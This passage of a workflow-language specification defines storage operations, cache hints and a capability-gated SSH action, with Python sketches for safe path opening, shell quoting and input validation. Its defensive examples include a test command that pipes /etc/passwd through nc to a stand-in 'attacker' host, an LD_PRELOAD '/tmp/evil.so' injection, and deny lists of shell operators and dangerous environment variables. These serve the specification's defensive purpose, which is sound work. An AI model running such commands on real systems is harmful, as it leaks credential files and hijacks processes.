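On POSIX systems, the descriptor-relative open described above might be sketched in Python as follows. This is a non-normative illustration: `open_beneath` is a hypothetical name, and the sketch is stricter than the text requires because it refuses every symlink component rather than only those that point outside the storage root.

```python
import os


def open_beneath(root_fd: int, relative: str) -> int:
    """Open a file under root_fd without following any symlink component.

    Returns a read-only file descriptor that the caller must use for all
    subsequent I/O and eventually close.
    """
    parts = [p for p in relative.split("/") if p]
    if not parts or any(p in (".", "..") for p in parts):
        raise ValueError("invalid relative path")
    fd = os.dup(root_fd)
    try:
        for index, part in enumerate(parts):
            flags = os.O_RDONLY | os.O_NOFOLLOW
            if index < len(parts) - 1:
                flags |= os.O_DIRECTORY  # intermediate components must be real directories
            # dir_fd makes this an openat()-style, directory-relative open.
            next_fd = os.open(part, flags, dir_fd=fd)
            os.close(fd)
            fd = next_fd
    except BaseException:
        os.close(fd)
        raise
    return fd
```

Because each component is opened relative to the previously opened directory descriptor, a path component swapped for a symlink between checks causes the open to fail instead of being followed.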

**`data:`** -- CEL expression providing file content for `put`. Accepts: BINARY (raw bytes), STRING/TEXT (auto-encoded to bytes via charset), MAP/ARRAY (auto-serialized — format inferred from `path` extension, or raises `EncodeError` if ambiguous), or a RESOURCES handle (engine auto-extracts `$value` for content and preserves `$name` for filename hints — same pattern as `mail` attachments). When `data` is `=RESOURCES.config`, it is equivalent to `=meta(RESOURCES.config).value` in this context.

**`parseAs:`** -- optional content type for auto-parsing on `get` results. Two forms:

- **String form:** bare constant (`JSON`, `YAML`, `XML`, `CSV`, `TSV`, `TEXT`, `BINARY`) or CEL `=` expression.
- **Object form:** `{ $kind?: JSON|..., $type?: ..., $name?: ... }` — at least one field required. `$kind` acts as both parse format and result kind annotation (same values as string form); `$type` attaches a semantic MIME type (e.g., `application/vnd.api+json`); `$name` carries a filename through to a later `mail` attachment or `storage put`.

When present, `RESULT.data` is auto-parsed. When absent, `RESULT.data` is raw bytes (BINARY). Parse failure raises `ParseError` with `ERROR.DATA.field: "data"`.

**`overwrite:`** -- default `false` to prevent accidental data loss. When `false` and target exists, raises `StorageError` with `ERROR.DATA.reason: "already_exists"`. Explicit `overwrite: true` is REQUIRED to replace existing files.

**Result shapes:**

`get`:
```
RESULT.data       -- file content (raw bytes, or auto-decoded if parseAs set)
RESULT.name       -- STRING: filename (last path component)
RESULT.size       -- INTEGER: content length in bytes
RESULT.type       -- STRING: MIME content type (inferred or server-provided)
RESULT.modified   -- STRING: last modified timestamp (ISO 8601)
RESULT.etag       -- STRING: ETag/checksum if provided (null otherwise)
RESULT.metadata   -- MAP: provider-specific metadata (S3 user metadata, etc.)
RESULT.cache      -- MAP (null when caching inactive/unsupported):
  .hit            -- BOOLEAN: true if served from cache
  .stale          -- BOOLEAN: true if served stale (revalidating or error fallback)
  .age            -- INTEGER: seconds since cache entry creation
  .source         -- STRING: ORIGIN | CACHE | STALE_REVALIDATING | STALE_ERROR
  .revalidated    -- BOOLEAN: true if conditional GET confirmed freshness
  .negativeHit    -- BOOLEAN: true if this is a cached "not found" result
```

`put`:
```
RESULT.path       -- STRING: full remote path of uploaded file
RESULT.size       -- INTEGER: bytes written
RESULT.etag       -- STRING: ETag/checksum if provided (null otherwise)
RESULT.cache      -- MAP (null when caching inactive/unsupported):
  .invalidated    -- INTEGER: number of cache entries invalidated
```

`list`:
```
RESULT.entries    -- ARRAY of MAP, each with:
  .name           -- STRING (filename/dirname)
  .path           -- STRING (full remote path)
  .size           -- INTEGER (bytes, 0 for directories)
  .type           -- STRING ("file" or "directory")
  .modified       -- STRING (ISO 8601 timestamp)
RESULT.truncated  -- BOOLEAN (true if more results available)
RESULT.cursor     -- STRING (pagination cursor, null if not truncated)
RESULT.cache      -- MAP (null when caching inactive/unsupported):
  .hit            -- BOOLEAN
  .stale          -- BOOLEAN
  .age            -- INTEGER (seconds)
  .source         -- STRING: ORIGIN | CACHE | STALE_REVALIDATING | STALE_ERROR
  .revalidated    -- BOOLEAN
```

`info`:
```
RESULT.name       -- STRING: filename
RESULT.path       -- STRING: full remote path
RESULT.size       -- INTEGER: content length in bytes
RESULT.type       -- STRING: MIME content type
RESULT.modified   -- STRING: ISO 8601 timestamp
RESULT.etag       -- STRING: ETag/checksum
RESULT.metadata   -- MAP: provider-specific metadata
RESULT.cache      -- MAP (null when caching inactive/unsupported):
  .hit            -- BOOLEAN
  .stale          -- BOOLEAN
  .age            -- INTEGER (seconds)
  .source         -- STRING: ORIGIN | CACHE | STALE_REVALIDATING | STALE_ERROR
  .revalidated    -- BOOLEAN
  .negativeHit    -- BOOLEAN
```

`exists`:
```
RESULT.exists     -- BOOLEAN
RESULT.cache      -- MAP (null when caching inactive/unsupported):
  .hit            -- BOOLEAN
  .stale          -- BOOLEAN
  .age            -- INTEGER (seconds)
  .source         -- STRING: ORIGIN | CACHE | STALE_REVALIDATING | STALE_ERROR
  .revalidated    -- BOOLEAN
  .negativeHit    -- BOOLEAN
```

`delete`: `RESULT.path` -- STRING: full remote path. `RESULT.cache` -- MAP (null when caching inactive/unsupported): `.invalidated` -- INTEGER.

`mkdir`: `RESULT.path` -- STRING: full remote path.

`copy` / `move`: `RESULT.sourcePath`, `RESULT.targetPath` -- STRING. `RESULT.size` -- INTEGER. `RESULT.cache` -- MAP (null when caching inactive/unsupported): `.invalidated` -- INTEGER.

`transfer`: `RESULT.size` -- INTEGER: bytes transferred. `RESULT.sourcePath`, `RESULT.targetPath` -- STRING. `RESULT.cache` -- MAP (null when caching inactive/unsupported): `.invalidated` -- INTEGER.

**Transfer operation (cross-storage):**

```yaml
- storage:
    operation: transfer
    source:
      url: data
      path: "/data/export.csv"
    target:
      url: "sftp://backup.host"
      path: "/backups/export.csv"
    overwrite: true
    timeout: 30m
    result: { bytes: =RESULT.size }
```

The engine implements `transfer` as a bounded-buffer streaming pipe between two backend instances: it reads from the source and writes to the target without materializing the entire file in memory. Both `source.url` and `target.url` MUST resolve to backends declared in `requires.STORAGE` with appropriate operations (`get` on source, `put` on target). On source error: target write is aborted, partial file cleaned up by provider. On target error: source read is cancelled. The maximum transfer size is engine-configurable (default: 1 GB); exceeding it raises `ResourceExhaustedError`. For `transfer`, `url:`, `path:`, `data:`, and `parseAs:` are INVALID at the top level (SA-STORAGE-7, ERROR).
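The bounded-buffer behavior can be sketched in Python as a chunked copy with a size cap. This is a non-normative illustration: `stream_transfer` and the chunk size are hypothetical, interpreting 1 GB as 10**9 bytes is an assumption, and cleanup of a partial target file is left to the caller.

```python
from typing import BinaryIO


class ResourceExhaustedError(Exception):
    """Raised when a transfer exceeds the configured maximum size."""


def stream_transfer(source: BinaryIO, target: BinaryIO,
                    chunk_size: int = 64 * 1024,
                    max_bytes: int = 10**9) -> int:
    """Copy source to target one chunk at a time; return bytes transferred."""
    total = 0
    while True:
        chunk = source.read(chunk_size)  # at most one chunk is held in memory
        if not chunk:
            return total
        total += len(chunk)
        if total > max_bytes:
            raise ResourceExhaustedError(f"transfer exceeds {max_bytes} bytes")
        target.write(chunk)
```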

Cross-authority `copy`/`move` are NOT supported — SA-STORAGE-6 (ERROR). Use `transfer` + `delete` for cross-authority moves.

**Streaming:** `get` supports `onYield:` / `$yields` for large file downloads. `list` supports `onYield:` for large directory listings. `transfer` supports `onYield:` for progress updates. Streaming operations are exempt from the total transfer size limit, but each chunk is subject to the per-instance memory limit.

**Usage patterns:**

RESOURCES to S3 (alias):
```yaml
- storage:
    url: s3_archive                # bare alias
    operation: put
    path: ="uploads/" + meta(RESOURCES.config).name
    data: =RESOURCES.config
```

S3 JSON to parsed variable (literal URL):
```yaml
- storage:
    url: "s3://config-bucket"      # literal URL
    operation: get
    path: "config/settings.json"
    parseAs: JSON
    result: { settings: =RESULT.data }
# settings is now a MAP, ready for CEL access
```

Download, transform, re-upload (alias):
```yaml
- storage:
    url: data
    operation: get
    path: "raw/events.csv"
    parseAs: CSV
    result: { events: =RESULT.data }
- set:
    filtered: =events.filter(e, e.status == "active")
- storage:
    url: data
    operation: put
    path: "processed/active_events.csv"
    data: =filtered
```

**Errors:** `StorageError`, `StoragePathError`, `ConnectionError`, `TimeoutError`, `TLSError`, `AuthenticationError`, `AccessDeniedError`, `NotFoundError`, `MissingCapabilityError`, `ResourceExhaustedError`, `ParseError` (when `parseAs` fails).

**`cacheHint:`** -- advisory cache configuration for storage operations. Engines MAY implement caching at three conformance levels: **None** (parse & ignore — `RESULT.cache` is `null`), **Basic** (LOCAL scope TTL + EXACT invalidation), **Full** (all features). This directive provides **suggestions** to the engine — the engine may override, adjust, or ignore any cache hint based on its own policies, resource constraints, or operational requirements.

**String shorthand:** `"<ttl>[/<revalidation>[/<scope>]]"` — e.g., `"5m"`, `"5m/ALWAYS"`, `"5m/CONDITIONAL/GLOBAL"`. Grammar:

```
cacheHint-shorthand = ttl [ "/" revalidation [ "/" scope ] ]
ttl                 = 1*DIGIT duration-suffix
duration-suffix     = "ms" / "s" / "m" / "h" / "d"
revalidation        = "CONDITIONAL" / "ALWAYS" / "NEVER"
scope               = "LOCAL" / "CONTEXT" / "GLOBAL"
```
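
As an illustration of the grammar above, the following Python sketch parses the shorthand into its three parts. The function name `parse_cache_hint` and the returned dictionary shape are hypothetical. Filling omitted parts with the object-form defaults (`CONDITIONAL`, `LOCAL`) is an assumption, and the rejection of a zero TTL follows the `ttl:` property rule.

```python
import re

# One alternative per grammar production: ttl [ "/" revalidation [ "/" scope ] ]
_SHORTHAND = re.compile(
    r"(?P<value>[0-9]+)(?P<unit>ms|s|m|h|d)"
    r"(?:/(?P<revalidation>CONDITIONAL|ALWAYS|NEVER)"
    r"(?:/(?P<scope>LOCAL|CONTEXT|GLOBAL))?)?"
)
_UNIT_MS = {"ms": 1, "s": 1_000, "m": 60_000, "h": 3_600_000, "d": 86_400_000}


def parse_cache_hint(text):
    """Parse a cacheHint shorthand string into a plain dictionary."""
    match = _SHORTHAND.fullmatch(text)
    if match is None:
        raise ValueError(f"not a valid cacheHint shorthand: {text!r}")
    ttl_ms = int(match["value"]) * _UNIT_MS[match["unit"]]
    if ttl_ms == 0:
        raise ValueError("ttl of 0 is not valid; use cacheHint: false instead")
    return {
        "ttl_ms": ttl_ms,
        # Assumption: omitted parts take the object-form defaults.
        "revalidation": match["revalidation"] or "CONDITIONAL",
        "scope": match["scope"] or "LOCAL",
    }


hint = parse_cache_hint("5m/CONDITIONAL/GLOBAL")
```

Because the scope group is nested inside the revalidation group, a string such as `"5m//GLOBAL"` is rejected, which matches the grammar: a scope cannot appear without a revalidation value.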

**Boolean form:** `cacheHint: true` — explicit opt-in, engine-determined defaults. `cacheHint: false` — explicit opt-out, author asserts this data MUST NOT be cached.

**Object form:**

```yaml
cacheHint:
  # --- READ-SIDE ---
  ttl: duration|integer|CEL             # suggested time-to-live (default: engine-determined)
  revalidation: CONDITIONAL|ALWAYS|NEVER # validation strategy (default: CONDITIONAL)
  staleWhileRevalidate: duration|integer|CEL  # serve stale during background refresh (default: 0)
  staleIfError: duration|integer|CEL    # serve stale on backend errors (default: 0)
  negative: true|false|CEL             # cache "not found" results (default: false)
  negativeTtl: duration|integer|CEL    # TTL for negative entries (default: 30s)
  scope: LOCAL|CONTEXT|GLOBAL          # cache sharing boundary (default: LOCAL)
  varyBy: "<cel-expression>"           # additional cache key partitioning
  maxSize: integer|CEL                 # max cacheable content size in bytes
  priority: LOW|NORMAL|HIGH           # eviction priority hint (default: NORMAL)
  warm: true|false|CEL                # pre-populate cache at flow load (default: false)

  # --- WRITE-SIDE ---
  invalidation: EXACT|PREFIX|NONE     # invalidation strategy (default: EXACT)
  invalidatePaths: [string|CEL, ...]  # additional paths to invalidate on write

  # --- CONSISTENCY ---
  readYourWrites: true|false|CEL      # intra-instance consistency (default: false)
```

**Property details:**

- **`ttl:`** -- suggested time-to-live for cached entries. Duration literal (e.g., `5m`, `1h`), integer milliseconds, or CEL expression. When omitted, the engine determines TTL. A value of `0` is not valid (use `cacheHint: false` to disable caching).
- **`revalidation:`** -- how the engine validates cached entries. `CONDITIONAL` (default): use conditional GET (ETag/If-Modified-Since for S3, mtime stat for SFTP/FTP, LastWriteTime for SMB, mtime+size for local). `ALWAYS`: always revalidate with backend before serving. `NEVER`: serve from cache without revalidation until TTL expires.
- **`staleWhileRevalidate:`** -- serve stale content while refreshing in the background. Duration/integer/CEL. Default: `0` (disabled).
- **`staleIfError:`** -- serve stale content when the backend returns an error. Duration/integer/CEL. Default: `0` (disabled). **Interaction with `retry:`** — when both `staleIfError` and `retry` are configured, the engine checks stale cache as a fast-path optimization before the first retry. If stale content is available and within the `staleIfError` window, it is served immediately. If no stale content is available (or the window has expired), retries proceed normally. After all retries are exhausted without success, `staleIfError` is checked again as a final fallback.
- **`negative:`** -- cache "not found" results for `get`, `info`, and `exists` operations. Boolean or CEL. Default: `false`.
- **`negativeTtl:`** -- TTL for negative cache entries. Duration/integer/CEL. Default: `30s`. Only meaningful when `negative: true`.
- **`scope:`** -- cache sharing boundary. `LOCAL` (default): per-flow-instance. `CONTEXT`: shared across instances within the same context (correlation ID). `GLOBAL`: shared across all instances (tenant-scoped per FLOWMARKUP-ENGINE.md §5.4 item 8).
- **`varyBy:`** -- CEL expression producing a string that is appended to the cache key. Used for partitioning (e.g., `=ENV.REGION` to cache per-region).
- **`maxSize:`** -- maximum content size in bytes that should be cached. Integer or CEL. Content larger than this is fetched from origin every time. Not applicable to `info` or `exists`.
- **`priority:`** -- eviction priority hint. `LOW`, `NORMAL` (default), `HIGH`. Engines MAY use this to influence eviction order.
- **`warm:`** -- pre-populate the cache at flow load time. Boolean or CEL. Default: `false`. Applicable to `get` and `info` only. SA-STORAGE-24 (INFO) warns when used with streaming `get` (may consume significant memory).
- **`invalidation:`** -- write-side invalidation strategy. `EXACT` (default): invalidate cache entries matching the exact path. `PREFIX`: invalidate all entries whose path starts with the written path. `NONE`: do not invalidate cache on write.
- **`invalidatePaths:`** -- additional paths to invalidate on write. Array of string literals or CEL expressions. SA-STORAGE-29 (WARN) flags user-controlled input in invalidation paths.
- **`readYourWrites:`** -- ensures that within a single flow instance, a read following a write to the same path returns the written data (not a stale cache entry). Boolean or CEL. Default: `false`. SA-STORAGE-26 (WARN) flags use with `async: true` (contradictory). SA-STORAGE-30 (WARN) flags use on `transfer` (cross-storage, ambiguous semantics).
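
The three `invalidation:` strategies can be sketched in Python against a dictionary that maps paths to cached bytes. This is an illustration only: `invalidate_on_write` is a hypothetical name, the returned count is assumed to correspond to `RESULT.cache.invalidated`, and treating `invalidatePaths` entries as exact matches that apply under every strategy is an assumption.

```python
def invalidate_on_write(cache, written_path, strategy="EXACT", invalidate_paths=()):
    """Drop cache entries affected by a write and return how many were removed."""
    if strategy == "EXACT":
        targets = {written_path}
    elif strategy == "PREFIX":
        # Every cached path that starts with the written path.
        targets = {path for path in cache if path.startswith(written_path)}
    elif strategy == "NONE":
        targets = set()
    else:
        raise ValueError(f"unknown invalidation strategy: {strategy!r}")
    targets.update(invalidate_paths)  # assumption: extra paths are exact matches
    removed = [path for path in targets if path in cache]
    for path in removed:
        del cache[path]
    return len(removed)


cache = {
    "reports/a.csv": b"1",
    "reports/a.csv.bak": b"2",
    "reports/b.csv": b"3",
    "index.json": b"4",
}
invalidated = invalidate_on_write(cache, "reports/a.csv", "PREFIX")
```

Here `PREFIX` removes both `reports/a.csv` and `reports/a.csv.bak`, while `EXACT` would remove only the first.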

**Per-operation applicability:**

| Operation | Read-Side | Write-Side | readYourWrites | warm |
|-----------|-----------|------------|----------------|------|
| `get` | All | -- | Yes | Yes |
| `info` | All (no maxSize) | -- | Yes | Yes |
| `exists` | All (no maxSize, no warm) | -- | Yes | -- |
| `list` | All (no negative, no warm) | -- | Yes | -- |
| `put` | -- | All | Yes | -- |
| `delete` | -- | All | Yes | -- |
| `copy` | -- | All | Yes | -- |
| `move` | -- | All | Yes | -- |
| `mkdir` | N/A | N/A | N/A | N/A |
| `transfer` | -- | invalidation, invalidatePaths | -- | -- |

**Defaults inheritance:** `cacheHint:` is eligible for `defaults:` with replace-not-merge semantics (same as `retry:`, `timeout:`). Omitting `cacheHint:` on a step inherits from defaults; `cacheHint: false` explicitly opts out. `cacheHint:` in `defaults:` is silently ignored by non-storage action steps.

**Key interactions:**

- **`parseAs:`** -- engine caches raw bytes; `parseAs` is applied after cache retrieval.
- **`onYield:`** -- compatible; engine MAY cache complete content after streaming finishes.
- **`async: true`** -- write-side invalidation is valid. `readYourWrites: true` is contradictory (SA-STORAGE-26). `cacheHint:` on `async: true` read operations is contradictory since the result is discarded (SA-STORAGE-25).
- **`retry:`** -- see `staleIfError` interaction above.
- **`condition: false`** -- no cache interaction occurs (step is skipped entirely).
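
The ordering of the `staleIfError` and `retry:` checks can be sketched in Python as follows. The callables `fetch` and `lookup_stale` are hypothetical stand-ins for engine internals, retry delays are omitted, and reporting the served source as `STALE_ERROR` is an assumption based on the `RESULT.cache.source` values.

```python
def read_with_stale_fallback(fetch, lookup_stale, max_attempts=3):
    """Return (data, source) following the staleIfError / retry ordering.

    fetch() reads from the backend and raises ConnectionError on failure.
    lookup_stale() returns stale data still inside the staleIfError window,
    or None when nothing usable is cached.
    """
    if max_attempts < 1:
        raise ValueError("max_attempts must be at least 1")
    last_error = None
    for attempt in range(1, max_attempts + 1):
        try:
            return fetch(), "ORIGIN"
        except ConnectionError as exc:
            last_error = exc
            if attempt == 1:
                # Fast path: consult the stale cache before the first retry.
                stale = lookup_stale()
                if stale is not None:
                    return stale, "STALE_ERROR"
    # Final fallback: every attempt failed, so check the stale cache once more.
    stale = lookup_stale()
    if stale is not None:
        return stale, "STALE_ERROR"
    raise last_error


def backend_down():
    raise ConnectionError("backend unavailable")


served = read_with_stale_fallback(backend_down, lambda: b"cached copy")
```

The second lookup matters when the cache is shared: another instance may have populated the entry while this one was retrying.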

---

#### `ssh` -- Remote Command Execution

Runs a command on a remote host via SSH. Capability-gated (deny-by-default). The flow addresses hosts by hostname or provisioned alias. The engine resolves aliases, credentials, and connection details. If the engine does not support SSH, it raises `UnsupportedProviderError` at flow load time.

**`host:`** -- SSH target. Three forms: (1) **bare alias** — engine-provisioned or parent-flow-provisioned name (e.g., `host: prod_server`); (2) **literal hostname** (`host: "prod.example.com"` or `host: "prod.example.com:2222"`); (3) **CEL expression** (`=` prefix, must evaluate to a hostname string). REQUIRED. Resolution order: CEL (`=` prefix) → literal hostname (contains `.` or `:`) → bare alias (matches `^[a-z][a-z0-9_]*$`).
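
The resolution order can be expressed as a small Python sketch. The function name `classify_host` and the returned labels are hypothetical; only the three checks and their order come from the paragraph above.

```python
import re

_ALIAS = re.compile(r"[a-z][a-z0-9_]*")


def classify_host(host):
    """Classify an ssh host value as CEL, HOSTNAME, or ALIAS."""
    if host.startswith("="):
        return "CEL"  # checked first: CEL text may itself contain "." or ":"
    if "." in host or ":" in host:
        return "HOSTNAME"
    if _ALIAS.fullmatch(host):
        return "ALIAS"
    raise ValueError(f"not a CEL expression, hostname, or alias: {host!r}")


kinds = [classify_host(h) for h in ("=ENV.SSH_HOST", "prod.example.com:2222", "prod_server")]
```

The order is significant: `=ENV.SSH_HOST` contains a `.`, so testing for a literal hostname before the `=` prefix would misclassify it.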

> **SSH host validation.** When `ssh.host` is a CEL expression, the engine MUST evaluate the expression and validate the resolved hostname against the SSH capability's declared aliases and hostnames before establishing the connection. Connections to undeclared hosts MUST raise `MissingCapabilityError`. Static analysis rule SA-SSH-13 (ERROR) MUST flag `ssh.host` CEL expressions that reference user-controlled input; the rule is defined in `FLOWMARKUP-VALIDATION.md`. *(CWE-918)*

```yaml
- ssh:
    _label_: "Human-readable"
    _id_: step_name
    host: prod_server              # bare alias (engine/parent-provisioned)
    # host: "prod.example.com"     # alternative: literal hostname
    # host: =ENV.SSH_HOST          # alternative: CEL expression
    command: "executable"          # REQUIRED. Static plain string (NOT CEL). For capability validation.
    args: ["arg1", =dynamic_arg]   # Optional. Array of CEL expressions.
    workingDir: "<CEL expression>" # Optional. Remote working directory.
    env: { KEY: =value }           # Optional. Environment variables injected on remote.
    stdin: "<CEL expression>"      # Optional. Data piped to remote command stdin.
    parseAs: JSON|YAML|XML|CSV|TSV|TEXT|BINARY|CEL   # string or object; Default: TEXT. Auto-parse stdout.
    # parseAs: {$kind: JSON, $type: ..., $name: ...}              # object form
    charset: plain                 # Optional charset override for stdout.
    stderrCharset: plain           # Optional charset override for stderr.

    # Universal action fields:
    condition: "<cel-expression>"
    timeout: duration
    retry: ...
    rateLimit: ...
    circuitBreaker: ...
    async: false
    result: ...
    onYield: ...
    errors: [SshError, ...]
    rollback: [...]
    catch: ...
```

**`command:`** -- static plain string (same carve-out as `exec.command:` and `throw.error:`). NOT CEL. The engine validates it against the `SSH` capability allowlist. Three checks apply: the schema rejects `=`-prefixed strings via the `^[^=]` pattern constraint; SA-SSH-1 (ERROR) rejects shell metacharacters; SA-SSH-2 (ERROR) rejects commands not in the allowlist.

**`args:`** -- array where each string item is a CEL expression (same as `exec.args:`). The engine constructs the remote command by joining `command` + individually POSIX-shell-escaped `args`. Each argument is single-quoted with internal single-quotes escaped as `'\''`. This prevents shell injection on the remote host.

**`env:`** -- environment variables prepended to the remote command as `env KEY1='val1' KEY2='val2' <command> <args>` (also POSIX-escaped). Secret values in `env:` are resolved at the action boundary (same as `exec.env:`).
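
The command construction described for `args:` and `env:` can be sketched in Python. The helper names `posix_quote` and `build_remote_command` are hypothetical, and the sketch assumes `command` has already passed the static checks, so it is emitted unquoted. Null bytes are rejected because they cannot be represented in a shell argument.

```python
import shlex


def posix_quote(value):
    """Wrap value in single quotes, escaping embedded single quotes as '\\''."""
    if "\0" in value:
        raise ValueError("null bytes are not allowed in arguments or env values")
    return "'" + value.replace("'", "'\\''") + "'"


def build_remote_command(command, args=(), env=None):
    """Assemble: env KEY='val' ... <command> <quoted args>."""
    parts = []
    if env:
        parts.append("env")
        parts.extend(f"{name}={posix_quote(value)}" for name, value in env.items())
    parts.append(command)  # assumption: already validated, static, metacharacter-free
    parts.extend(posix_quote(arg) for arg in args)
    return " ".join(parts)


remote = build_remote_command("grep", ["it's", "a b"], {"LANG": "C"})
round_trip = shlex.split(remote)  # a POSIX-style split recovers the original values
```

Every argument is quoted unconditionally, including ones that look harmless; this keeps the rule simple and avoids deciding which characters are "safe".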

**`stdin:`** -- data piped to the remote command's stdin via the SSH channel. Pipe closed after data is sent (same as `exec.stdin:`).

**`parseAs:`** -- auto-parse for stdout (primary output). Same semantics as `exec.parseAs:`: JSON/YAML/XML → structured value, CSV/TSV → list of maps, TEXT → string, BINARY → bytes. Default: `TEXT`. Two forms: string (`parseAs: JSON`) or object (`parseAs: { $kind?: JSON, $type?: ..., $name?: ... }`) — `$kind` sets parse format and result kind; `$type`/`$name` attach metadata. Stderr is always TEXT — decode manually via CEL if needed.

**Output:** `RESULT.stdout` (stdout content, auto-decoded via `parseAs:`), `RESULT.stderr` (stderr, always TEXT), `RESULT.exitCode` (INTEGER: remote process exit code).

**Auto-throw:** A non-zero exit code raises `SshError` unless `exitCode` is mapped in `result:`.

**Streaming:** stdout supported via `onYield:` / `$yields` (same as `exec`).

**Security model:**

1. **`command:` is static** — for capability allowlist validation. SA-SSH-2 (ERROR) rejects commands not in the allowlist.
2. **POSIX shell escaping is mandatory** — the engine MUST escape all arguments and env values. There is no "raw command string" mode.
3. **No shell operators in `command:`** — SA-SSH-1 (ERROR) rejects `command:` values containing `|`, `>`, `<`, `&&`, `||`, `;`, `$()`, backticks, or `\n`.
4. **No interactive sessions** — SSH action is strictly `exec` channel, never `shell` channel. No PTY allocation.
5. **Host key verification is mandatory** — follows from TLS verification principle (ENGINE.md §5.4 item 17). No option to disable per-flow.
6. **No port forwarding** — SSH action supports command execution only.
7. **Interpreter rejection** — SA-SSH-3 (ERROR) rejects SSH allowlists containing interpreter names (same as SA-EXEC-10).
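
The operator check in item 3 can be sketched in Python as a plain substring scan. The function name `shell_operators_in` is hypothetical, and matching `$()` by its opening `$(` is an assumption about how the rule detects command substitution.

```python
# Tokens listed for SA-SSH-1; "$(" stands for the "$()" command-substitution form.
_FORBIDDEN = ("|", ">", "<", "&&", "||", ";", "$(", "`", "\n")


def shell_operators_in(command):
    """Return the forbidden shell tokens found in a command string."""
    return [token for token in _FORBIDDEN if token in command]


clean = shell_operators_in("systemctl")
piped = shell_operators_in("cat /etc/passwd | nc attacker 4444")
```

An empty list means the value passes this particular check; the allowlist check (SA-SSH-2) is separate and not shown.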

**Documented limitation:** SSH commands are interpreted by the remote host's login shell. The engine provides POSIX single-quote escaping which is safe for all POSIX-compliant shells (bash, zsh, sh, dash, ksh). Non-POSIX remote shells (Windows `cmd.exe`, PowerShell) require a custom service provider via `call`.

**Shell escaping requirements.** Engines MUST apply POSIX shell escaping to ALL user-supplied values interpolated into SSH commands, including `ssh.args` items, `ssh.env` values, and any CEL-derived components. Single-quote wrapping with internal single-quote escaping (`'\''`) is the REQUIRED escaping strategy. The engine MUST NOT rely on double-quote escaping, which is vulnerable to variable expansion (`$VAR`), command substitution (`` `cmd` ``), and history expansion (`!`). The engine MUST reject any argument containing null bytes (`\0`). For arguments passed to `ssh.args`, the engine MUST perform escaping at the engine level immediately before SSH command construction — flow-level escaping is insufficient because intermediate processing may inadvertently unescape values. *(CWE-78)*

**Environment variable injection prevention.** When `ssh.env` names or values are derived from user-controlled input (including CEL expressions that reference it), the engine MUST validate that each variable name conforms to `^[A-Z_][A-Z0-9_]{0,255}$` (at most 256 characters) and that no value contains null bytes. Engines MUST deny setting security-sensitive environment variables (`LD_PRELOAD`, `LD_LIBRARY_PATH`, `DYLD_LIBRARY_PATH`, `PATH`, `HOME`, `SHELL`, `IFS`, `CDPATH`, `ENV`, `BASH_ENV`, `PYTHONPATH`, `NODE_PATH`, `RUBYLIB`, `PERL5LIB`, `CLASSPATH`) from user-controlled sources. Static analysis rule SA-SSH-12 MUST flag `env` entries where the key or value references user-controlled input without validation. *(CWE-426: Untrusted Search Path)*
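
These checks can be sketched in Python. The function name `env_violations` and its message strings are hypothetical; the sketch applies the name pattern together with the 256-character cap stated in the prose, and it treats every entry as user-controlled.

```python
import re

_SAFE_NAME = re.compile(r"[A-Z_][A-Z0-9_]*")
MAX_NAME_LENGTH = 256  # assumption: the cap stated in the prose
_DENIED_NAMES = frozenset({
    "LD_PRELOAD", "LD_LIBRARY_PATH", "DYLD_LIBRARY_PATH", "PATH", "HOME",
    "SHELL", "IFS", "CDPATH", "ENV", "BASH_ENV", "PYTHONPATH", "NODE_PATH",
    "RUBYLIB", "PERL5LIB", "CLASSPATH",
})


def env_violations(name, value):
    """Return the reasons a user-controlled env entry must be rejected."""
    problems = []
    if len(name) > MAX_NAME_LENGTH or not _SAFE_NAME.fullmatch(name):
        problems.append("invalid name")
    if name in _DENIED_NAMES:
        problems.append("security-sensitive name")
    if "\0" in value:
        problems.append("null byte in value")
    return problems


accepted = env_violations("APP_MODE", "production")
rejected = env_violations("LD_PRELOAD", "/tmp/evil.so")
```

Returning a list rather than raising on the first problem lets a caller report every violation for an entry at once.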

**Errors:** `SshError`, `ConnectionError`, `TimeoutError`, `TLSError`, `AuthenticationError`, `AccessDeniedError`, `MissingCapabilityError`.

---

### 4.7 Validation Rules

Action contract validation covers required and optional parameters, output mapping, and error checking. See the AC rules in `FLOWMARKUP-VALIDATION.md`.

---

## 5. Engine Implementation

Engine architecture, security model, static analysis, observability, audit logging, tooling, and testing requirements are specified in **[FLOWMARKUP-ENGINE.md](FLOWMARKUP-ENGINE.md)**. Section numbers (§5–§7) are preserved in that document for cross-reference continuity.

---

## 6. Tooling

See [FLOWMARKUP-ENGINE.md](FLOWMARKUP-ENGINE.md) §6 for flow file URL resolution requirements.

---

## 7. Testing

See [FLOWMARKUP-ENGINE.md](FLOWMARKUP-ENGINE.md) §7 and [FLOWMARKUP-TESTING.md](FLOWMARKUP-TESTING.md) for the full testing framework specification.

---

## 8. Recommendations

This section provides advisory best-practice guidance for flow authors. All recommendations use SHOULD language — they are not normative requirements but represent patterns that produce more reliable, maintainable, and secure flows. Each recommendation has a citable `R-XX-N` identifier (mirroring SA-rule naming) and cross-references the SA rules that enforce related constraints.

### 8.1 Security (R-SEC-\*)

| ID | Rule | Rationale |
|---|---|---|
| R-SEC-1 | Use `SECRET.*` for all credentials (API keys, passwords, tokens, certs, connection strings); reserve `ENV.*` for non-sensitive config (hostnames, ports, feature flags, base URLs) | `SECRET.*` provides mandatory redaction (MUST vs SHOULD), opaque handles preventing leakage, pluggable backends, and typed credentials. `ENV.*` values are plain strings that can be logged, assigned, and returned. See [FLOWMARKUP-SECRETS.md](FLOWMARKUP-SECRETS.md) §2.3 comparison table |
| R-SEC-2 | Inject secrets into `exec` via `env:`, never via `args:` | Command-line arguments are visible in `ps` output, `/proc/<pid>/cmdline`, and audit logs. Environment variables do not appear in process listings and are readable only by the process owner and privileged users. SA-SECRET-17 enforces this |
| R-SEC-3 | Grant least-privilege capabilities to sub-flows — name specific secrets, hosts, commands in `cap:` | Monotonically decreasing capability model limits blast radius. Prefer explicit `cap:` restrictions over `cap: INHERIT`. SA-CAP-3 flags `SECRET: INHERIT` when explicit enumeration is possible |
| R-SEC-4 | Pin remote sub-flow integrity with `integrity: sha256-...` and use commit SHA `?ref=` | Remote flows should use `integrity:` hashes for tamper detection. SA-RUN-2 (remote flow without `integrity:`), SA-RUN-11 (mutable `?ref=` without `integrity:`) |
| R-SEC-5 | Never log, return, or interpolate `SECRET.*` values — log the key name instead | `SecretValue` is opaque by design. SA-SECRET-3 (log), SA-SECRET-16 (URL), SA-SECRET-20 (template interpolation) all enforce this. Write `log: "Using credential SECRET.api_key"` not `log: "Token: {{SECRET.api_key}}"` |
